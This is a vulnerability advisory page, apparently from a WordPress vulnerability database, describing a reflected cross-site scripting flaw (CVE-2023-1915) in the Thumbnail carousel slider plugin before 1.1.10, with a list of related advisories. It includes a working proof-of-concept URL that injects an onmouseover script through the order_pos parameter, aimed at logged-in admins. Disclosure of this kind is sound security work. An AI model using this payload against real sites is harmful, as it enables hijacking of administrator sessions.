Thumbnail carousel slider < 1.1.10 – Reflected XSS | CVE 2023-1915 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting vulnerability which could be used against high privilege users such as admin.

Proof of Concept

Make a logged in admin open: GET /wp-admin/admin.php?page=responsive_thumbnail_slider_image_management&order_by=title&order_pos=uqxt1%22%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20cxz0m
 
Affected parameters: order_by, order_pos, and search_term

Affects Plugins

wp-responsive-thumbnail-slider

Fixed in 1.1.10

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Chien Vuong

Submitter

Chien Vuong

Verified

Yes

WPVDB ID

0487c3f6-1a3c-4089-a614-15138f52f69b

Timeline

Publicly Published

2023-04-18 (about 2 years ago)

Added

2023-04-18 (about 2 years ago)

Last Updated

2023-04-18 (about 2 years ago)

Other

Published

Title

Published

2022-05-18

Title

Themify - WooCommerce Product Filter < 1.3.8 - Reflected Cross-Site Scripting

Published

2016-02-08

Title

Huge IT Image Gallery <= 1.7.0 - Reflected Cross-Site Scripting (XSS)

Published

2024-08-19

Title

The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce < 5.6.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Video Widget

Published

2022-06-06

Title

miniOrange's Malware Scanner < 4.5.2 - Admin+ Stored Cross-Site Scripting

Published

2024-06-06

Title

Stellissimo Text Box <= 1.1.4 - Authenticated (Admin+) Stored Cross-Site Scripting